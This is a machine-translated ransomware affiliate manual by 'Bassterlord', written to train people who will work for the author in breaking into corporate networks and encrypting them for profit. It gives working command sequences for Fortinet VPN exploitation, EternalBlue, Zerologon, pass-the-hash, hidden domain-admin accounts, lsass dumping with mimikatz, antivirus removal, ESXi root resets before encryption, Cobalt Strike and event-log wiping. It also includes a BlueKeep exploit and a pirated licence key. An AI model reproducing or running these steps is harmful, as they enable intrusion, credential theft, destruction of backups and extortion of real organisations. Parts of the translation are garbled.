Translated from Russian to English - www.onlinedoctranslator.

com

Networking manual

by Bassterlord (FishEye)
 Foreword

This manual is designed for beginners in the subject.

But above all, for the people who will work for me.

All information will be presented in the format of a manual.

There will be no meaningless explanations of how a certain exploit works.

and mountains of incomprehensible code, we will immediately put it into practice.
How to deploy an environment
 We'll need

1. The virtual player is definitely hisTYTS

2. VPNTYTS - preferably use it on the main machine (not in virtual)

3. Kali linux torrentTYTS

4. Any Windows 10

5.NmapTYTS

6. MimicTYTS

7. GMERTYTS

8. ScannerTYTS - paid to use only on a virtual machine, do not throw it on broken

computers (there will be a free crack next to it in the archive)

9. PysecdumpTYTS

10. PsexecTYTS

11. Fortinet vpnTYTS

12.ProcdumpTYTS

13. PowerTool (will be in the archive next to the document)

14. MetasploitTYTS

15. Bluekeep exploit for 3389 under Windows (located nearby in the archive)

16. IMPACT "https://github.com/SecureAuthCorp/impacket »

17. Zerologon exploit (located in cve-2020-1472-exploit.py archive)

18. Fortinet exploithttps://github.com/7Elements/Fortigate »

19. VeracryptTYTS

20. Rent a server $150 per month [email protected]

21. TOX for communication and correspondenceTYTS

The final schema will look like this
 Installing software in kali

We start the virtual machine, enter the login kali password kali

Copy fortinet vpn 123.deb in kali to the home folder

Opening the console do

sudo dpkg -i 123.deb

enter the kali password and press enter (passwords in kali are not displayed in the
console, you must enter in the blind)

Next, enter

sudo git clonehttps://github.com/SecureAuthCorp/impacket

cd pack

sudo python setup.py install

If it asks for a password, enter kali

 Installing software on a Windows virtual machine

We install everything according to the list from the screen with all the default settings.

We put a pythonhttps://www.python.org/downloads/

Copy the folder impakt to diskC:\

Open command prompt in windows as admin

We enter commands

cdc:\impacket

python setup.py install

copy the zerologon exploit on python into the impacket folder:

cve-2020-1472-exploit.py

We install everything else by default and copy the software to the

desktop.
Collecting material and how to mine it
 For the extraction of material for work, we go to the service

http://masscan.online/ru

We buy an account of your choice and scan the whole world for popular
HTTPS ports example below:

After the scan is completed, download the results

Let's go to cali

Open the console and write

git clonehttps://github.com/7Elements/Fortigate

cd Fortigate

pip3 install -r requirements.txt

fortigate.py [-h] [-i INPUT] [-o OUTPUT] [-t THREADS] [-c

CREDSCAN]

fortigate.py -i textbook with our ips -O valid.txt -t

10-cy

run and wait for valid

 As a result, we get something like

This will be our material for work, copy our valid to a virtual machine with
Windows and see the next section.
 RANSOMWARE = Terrorism
All your actions that you will perform
further you do at your own peril and
risk.
However, this risk brings millions!
I'm not promoting ransom it's just mans by
pentest.
Beginning of work
First of all, we go into our virtual machine under Windows

Open fortinet vpn client

Click configure VPN

Next, enter your username and password

If the connection is successful, you will see

Next, I recommend copying the route_print.cmd cmd file to the
desktop from the archive and running it

We see the following picture and pay attention to the interface and
netmask:

In this case, we see a range

10.102.96.0 - 255.255.255.0

this means that in the scanner we will register it in this way:

10.102.96.0 - 10.102.96.255

If we saw this picture:

10.102.0.0 - 255.255.0.0

Then in the scanner we will write

10.102.0.0 - 10.102.255.255
If we see

0.0.0.0 - 0.0.0.0

0.0.0.0 - 0.0.0.0 from above 2 times

So we scan the network ranges as in the example above, if they

are, if they are not there and there are double lines with zeros,
then we take and scan the entire range

192.168.0.0 - 192.168.255.255

Open our Softperfect scanner and enter the resulting ranges.

We do CTRL + O, the scanner settings will open, we set everything as

in my screenshots
Click OK
Go to account settings

Here we will enter logins and passwords from our vpn

If you are using the paid version of the scanner, then you will have a field

nmap integration
Put a tick on the ethernal and start scanning

After the scan is complete, we will see something like this:

Our task is to sort the results by working group and by TCP

ports. And check for red C$ disks in the positives under the IP
address column.
Also, do not forget that if we have a paid version of the scanner, we
some alternative settings needed
 Ports and their correspondence with services

General:135,137,139,445,8080,80,443

Nas synology port: 5000,5001 - Data storage

Veeam: 9443,9392,9393,9401,6160 - Backups

DB mysql,mssql,db2,postgresql: 3306,1433,50000,5432,5433 -
Databases

Veritas backup exec. 6101,10000,3527,6106,1125,1434,6102 server

3527,6106 - Backups

Oracle: 1521,1522

Remote control: 22,21,3389 4899,5900 - Possibility of alternative

connection to a computer

Nfs: 111,1039,1047,1048,2049

Iscsi: 860.3260

replication: 902,31031,8123,8043,5480,5722

Sophos Web: 4444

Sophos Console: 2195,8190,8191,8192,8193,8194,49152-65535

In the far right column after the scan, we will observe

vulnerable devices for the Eternal Blue vulnerability (MS-17-010)

Next, we will consider the exploitation of this vulnerability in

detail.
 MS-17-010 (Eternal Blue)

To exploit the vulnerability, you will need

Metasploit installed on a virtual machine

Opening the CMD console in Windows

We write msfconsole, press enter and wait for our loading

metasploit

After loading the metasploit, enter the following commands one by one:

setg LHOST ip of our vpn

setg RHOSTS ip of our vulnerable devices separated by commas
space

exploit/windows/smb/ms17_010_psexec

set payload payload/windows/meterpreter/bind_tcp

exploit

The end result looks like this:

Press enter and hope for success

If successful, you will see this:

In case of ACCESS DENIED errors

You can try to encrypt the payload from

antivirus with the commands below:
 set EnableStageEncoding true

set StageEncoder x86/shikata_ga_nai

set encoder x86/shikata_ga_nai

set ExitOnSession false

set SessionCommunicationTimeout 0

exploit

Next, we wait for the process to complete and watch active sessions
meterpreter-a

The sessions command displays a list of computers by number

which managed to break through the exploit

In our case we have 2 open sessions

Let's move on to the first command sessions 1

Next, enter the commands:

getsystem

load kiwi

sysinfo - here we are interested in whether the computer is in a domain

In this case, we see that yes it is in the domain

 Next, enter the hashdump command

We get a list of user hashes and copy them to

separate textbook.

Next, enter creds_all - this command will try to pull out not
encrypted passwords from the system
 We also copy them into a separate text document.

If we have several sessions in the meterpreter, then we enter

the bg command and repeat the above points starting from
sessions only now we enter sessions 2 etc. Until
let's go through all the sessions.

Further, without closing the console, we go to the service

https://www.crackmd5.ru/ and try to decrypt the received

hashes.

Since we have already obtained public account passwords from

creds_all commands

We drive them into the scanner Settings => Account Management

Enter accounts in the format Domain\login password.

After that, close the account control panel, select

all IP addresses and do a network rescan:
 After we open all the pluses in the IP address column and look
acquired rights.

We are interested in red local disks C$

If there are red disks everywhere in the domain, this means that we have received
the administrator's domain on the network and we have rights everywhere
to read and modify data on a remote machine.
 If only on several machines, then only the rights of local
administrators and you should look for other accounts
records.

If we do not have open passwords, but only hashes that could

not be decrypted, we will consider login vulnerabilities by
hashes in the PASS THE HASH section of attacks.

If an open computer with a red C$ disk does not have port

3389, you can use the psexec tool, which we will discuss in
separate section.

If we pierced the server through the vulnerability, you can determine

it by the following parameters and comparing the IP sessions:

Or by the hostname in which the DC is present

For example WHDC.domain.local (values can be anything we

it is important to know exactly DC)

Then you can

Execute commands in the service session

shell

net group

net group "Domain Admins" /domain

This will help us find out the domain administrator accounts

and, accordingly, is not distracted by ordinary users and their
accounts.

After all, the level of "GOD" is important to us, right?)

Zerologon
 To exploit the vulnerability, we need to scan the network and
define DC - Domain Controller

How to determine it is described on page 28 above.

We need to be connected to the network on which we produce

operation and also have Python installed on Windows

Also Impacket unpacked along the wayc:\impacket with the one already in it
cve-2020-1472-exploit.py

Also place a .cmd file with the following content on the desktop

We will rewrite it and launch it for the purposes we need on the network.
We sort by user accounts and substitute the necessary
us the values up to the first point as in the screenshot below

We save the Zerologon.cmd file and run it further, it all depends on

whether the server is patched for this vulnerability or not.

We repeat this action on all DCs in turn until we get

positive result:
 If the Performing authentication attempts line goes on for more
than 4 minutes or gives us a negative result, we move on to the
next DC or use other vulnerabilities if all DCs are not vulnerable.

Sometimes DCs do not give themselves away and it is necessary to scan all
machines in the domain (workgroup) with this exploit, but this pays off.

After successful operation, we go to our Kali

We connect to the vpn of the company

 Open the console and enter the following

cd impacket/examples

sudo python3 secretsdump.py -no-pass -just-dc AGLEADER/ag40server\ [email protected]

We press enter we will be asked to enter the password, enter into the blind kali and press enter

(remember that in Kali the entered password is not displayed for this in the blind)

We should go through the process of extracting accounts and hashes

After the end, we copy everything that the console gives us

 Next we go to the service. https://www.crackmd5.ru/

Trying to decrypt the admin hash (highlighted in yellow)

Administrator:500:aad3b435b51404eeaad3b435b51404ee: 48b3420f6a0f7ae1fb29104b213154ee :::

If we decrypt the password, we boldly break into all computers with

these credits, not forgetting to substitute the working group with an example:

AGLEADER\Administrator and our password.

If we don't get the password we need to use Pass The Hash

attack.
Pass The Hash
So we have hashes, but we could not get the password from the admin account.

We return to Kali.

If you closed the console, open it again

enter cd impacket/examples

sudo python3 smbexec.py -hashes

aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee
[email protected]

or

sudo python3 psexec.py -hashes

aad3b435b51404eeaad3b435b51404ee:48b3420f6a0f7ae1fb29104b213154ee
[email protected]

We substitute the data obtained from the operation of Zerologon

After execution, we will get CMD on the remote machine DC - C:\Windows\system32>

Next enter the following commands

net user support Pa$$wo0rd /add

net user support /active:yes

net localgroup Administrators support /add

If we break on "Loud", we can immediately create our own admin domain

net group "Domain Admins" support /add

After that, we get our account with domain administrator rights and
accordingly, we can break into all machines on the domain by account:

support Pa$$wo0rd

Next, we go to DC and remove the credits from the domain admins mimic 64.exe or 32.exe

Commands for facial expressions in turn:

privilege::debug - log 1234.txt - sekurlsa::logonPasswords full

AB bypasses
 We connected to the computer, first of all we look at the tray near the clock and
the icons displayed there and look for av.

If a simple Windows Defender is installed on your computer, go to the settings

and add the disk to the exclusionsC:\
Usually, antiviruses without a password can be stupidly uninstalled through the wizard.
uninstalling programs in windows.

It is important if we see installed av Sophos (blue) or Sentinel

on all machines, further work with this company will be

meaningless.

Other antivirus solutions can be safely killed through 2 tools:

Gmer

power tool

If you can’t kill av, open the Windows registry

go along the path:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE

and look for folders with the names AB

If we find, we look at all the subfolders that are in the folder with av, our goal is to find
the folders and values \u200b\u200bwithin them called Exclusions (exceptions)

Suppose we found the value of the exceptions let's say

C:\users\admin\java.exe

We rename our mimic or malware to java.exe and throw it along this

path if there is no such path or folders on this machine, create folders 1
in 1 as indicated in the exceptions and try to run our file.

In most cases, av does not see them if he is not too smart)

If none of the above comes out, we stomp on all machines in the

domain on port 3389 from the scanner and see if the av
there.
 If av is not installed on several machines, you can throw a portable soft-
perfect scanner there, scan the network from the inside, mount
disks and run our kh*ker sorry choked =D

Ideally, you need to kill av wherever possible and add disks to exceptions
C:\

And computers on which there is no port 3389, including NAS storage

mount and only then start lkh..k yes something like that =D
NAS and backups
 hardest part)

So we got access to the domain admin

Making a network scan from the inside

We look at all ports

Usually our storages hang on ports

5000.5001

and backups

Veeam: 9443,9392,9393,9401,6160

Veritas backup exec. 6101,10000,3527,6106,1125,1434,6102 server 3527,6106

or they will be signed in the hostname as NAS

Usually we hang outside the domain first of all we look at the scan if we
have access to them from a regular scan with accounts admin domain all
super.
 However, if we are in a workgroup, you can break through all the domain of admins and
try to log in to them using credits without a domain from broken accounts through a web
interface by opening the IP of us through a browser and specifying the port of us
through a colon.

In 40% of cases, domain admin credits should be suitable.

If they do not fit, we take the Administrator account and its password.

Log in to us as Admin with the same password or sort through passwords from
other domain admins, the probability of a breakdown increases.

Sometimes when scanning us through Softperfect, credentials are displayed

the entries that are active in the repository are usually:

Admin, backup, Sysadm and more.

If we opened the network through PASS THE HASH, we look for these accounts in the
results of the received hashes and get passwords from them through the hacking service
hashes.

With vims and other backups, the same topic.

And the most important thing at the stage Kh..ka we need to start with disks and computers
where is the most memory in 500 gigs or more

Accordingly, the most important and the first will be ideally screwed
"big data"
V C and ESXI
This section will conduct a great and
horrible:

Boris Nikolaevich Yeltsin

https://xss.is/members/204378/
 The trick is that you do not need to bypass av.

First you need to get loans from the vicecenter

In 60 percent, she is in the domain and allows YES for credits

In other cases, the keylogger

In my work, I often face the task of resetting the root password on esx.

Let's imagine the situation we have administrator credits vcenter has a domain
admin and the whole network is ready to fuck, but it was not possible to catch the password under
esx is one way.

No reboot no extra fawn

BUT I STRONGLY RECOMMEND YOUR PASS THE NIGHT BEFORE

WINDING THE NETWORK

That is, you reset the password and immediately encrypt.

This method is that we will enter esx into the domain and we will be able to
log in with domain admin credentials

Go to DC, open Active Directory Users and computers

And we create a global group ESX Admins there, be sure to include it there
your domain admin.

then return to vcenter

Select the esx host, click configure - Autentication Service - Join domain, enter the
domain in the format domain.local or domain.com which domain can be
find out by entering systeminfo on a computer in the domain

enter the admin domain login without a domain and its password. now everything is ready for
authorization, go to the esx host using domain admin credits and
reset root pass

Then just ssh into esx

turn off the cars

And you do dirty things

PSEXEC
 In this section, we will look at the Psexec tool and how it will be useful on
practice.

First of all, it will help us run any file on all wheelbarrows to

to which we have access.

Suppose we have an exe file that we need to run

Open CMD and drag psexec.exe there

and then write the following

If you removed all av added exceptions and did everything right

this exe will run on all computers.

If you need to run the file on behalf of the system add to

parameters -s -d -c file.exe

Through Psexec, you can receive and withdraw credits from remote computers if
they do not have 3389 ports, but we have an account.

Through the scanner, open the C$ folder and throw pysecdump.exe there

and procdump.exe
 So we got into the car doing

cdC:\

pysecdump.exe -s

This command will give us the hashes of the admin on the remote computer, we
are trying to break through the site or use PASS THE HASH in Kali on others
wheelbarrows.

Next do

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\

WDigest /v UseLogonCredential /t REG_DWORD /d 1

procdump.exe --accepteula -ma lsass.exe lsass.dmp

If successful on a remote wheelbarrow on diskC:\ lsass.dmp will be created

file.

Copy it to your computer next to mimikatz.exe

Open the mimic and do in it:

sekurlsa::minidump lsass.dmp

privilege::debug

log1234.txt

sekurlsa::logonPasswords full

It will also give us credits or hashes.

Next, you can try to remotely enable the RDP port with the command

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\

Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Doesn't always work!

After executing the command, it will be possible to join the RDP

After all, do not forget to delete all files and traces of work on the remote
wheelbarrow.
After all the steps, if you want to minimally erase the traces of your
stay and postpone break-in.

On the machines that you entered via RDP, you can open a powershell

and write the following:

wevtutil el | Foreach-Object {wevtutil cl "$_"}

This regex will erase all magazines.

Also commands to remove hidden cmd accounts

net user support Pa$$wo0rd /delete

net group "Domain Admins" support /delete

Cobalt Strike
About how I see all PP

Simply put, the methods I described above

completely fucking exclude kobu, well, if people
asking why not?
 In short, we rent a server for Linux

throw a kob in there

do in console
cd cs4.0

java -XX:ParallelGCThreads=4 -
Dcobaltstrike.server_port=50050 -
Djavax.net.ssl.keyStore=./cobaltstrike.store -
Djavax.net.ssl.keyStorePassword=123456 -server -XX:
+ AggressiveHeap -XX:+UseParallelGC -
javaagent:Hook.jar -classpath ./cobaltstrike.jar
server.TeamServer SERVAK IP 12345
Let's go to my car, I work from Windows in Kobe

To do this, you must first install Java.

Run cobaltstrike.bat

Enter the IP of our rented host account and

the password specified in the config above.
 Let's go to the section.

We create a listener.

Next, create a payload.

 After pressing the Generete button, we will have an
executable, shove it to the DC and run it there.

Next do

We do it there
 Next we go to

We select all the cars in the network and try to break into
them by admin hash.
It is worth mentioning that cars do not always go out in
general internet.
 Then we do

We turn the infected computer into a local one

a listener that everyone will knock on
cars in the area =D

It makes no sense to write about the rest of the functionality,

since for me the coba is suitable only for convenient withdrawal
of credits and search for credits from us.

And so it's just bat guano that burns like a

Christmas tree with everything you can, and the
crypt for this barn costs fucking money and you
Proger find which payload will rewrite yeah.
BLUEKEEP
I donate to you a self-written exploit for 3389

All you need to do is add ip with 3389

in a column without ports and run run.bat

If you open run.bat through a text editor, we will see

the hidden account credits that will be created on
pierced by expo computers.

Hoods will be saved in a separate text box.

Exp first tries to translate remote cars
to a blue screen and waits for them to reboot.

After the reboot, it automatically executes the

payload and we get a hidden account with rights
admin on the vulnerable computer.
This exp needs to be restarted 2-3 times it does not
always works as it should, it has to do with
restart timings on remote cars.
Well, now after we buried the sellers
rdp accesses, you can proceed to the conclusion
 Here is collected knowledge that will help you
earn one way or another, that's all I knew.

The source of illustrations for this manual is taken from

Manhwa Fish Eye Placebo

https://www.yuumeiart.com/

I do not argue that there are people smarter than me and with much whiter

an extensive store of knowledge, but as for me, this is

enough for pentesting any network, be it citrix,
cisco, palo alto, forts, pulses.

Bonus litsuha for softperfect until 2022

dUYiN30Q4+ydHwgPCwku3K+FYDomodEqW0bRGcTyxvdnlc7g4nne7cfwXOGPJbBVdPeqEs7jzX2yDiVxxiiNaCvNK4T7ML0Qfarren5vr
MZEBcoOivf7QQ05BPxSG370cIus/AZxAuRAcibpckx1Ie+R4UTNiyBh6ZVcIwii+8M1lnRp+lcRmFqbgLGZ/
cbzzh09IfaFKwoGJRPcTcnizxQtBJSk9sqlbNc6SwWeiQgl+0J+A1mrkrG3zd03vSjBUbc8daN08ebjOGYDsZVptkkhe5ASAJt/
Uwzs0QCqO2issqS+QpE/atLV3lR63k/
2G1y6yECKu7w+s1SV9aEKsxKhuBJplKLhbGoQIX7hGxDwww1HFLGqCZbAce1mz7aP6xqqltEgoM2oVvKv02tVUoLGYSHYtAGGoaksl
XXu4+MLs26nLUoltIfIcOC1dOQsjChjXil8Im+dDOY+V1m5M0e2GckmBjTX4blWbz+hOmjl23n6f0jSndxT70Dd3Jl9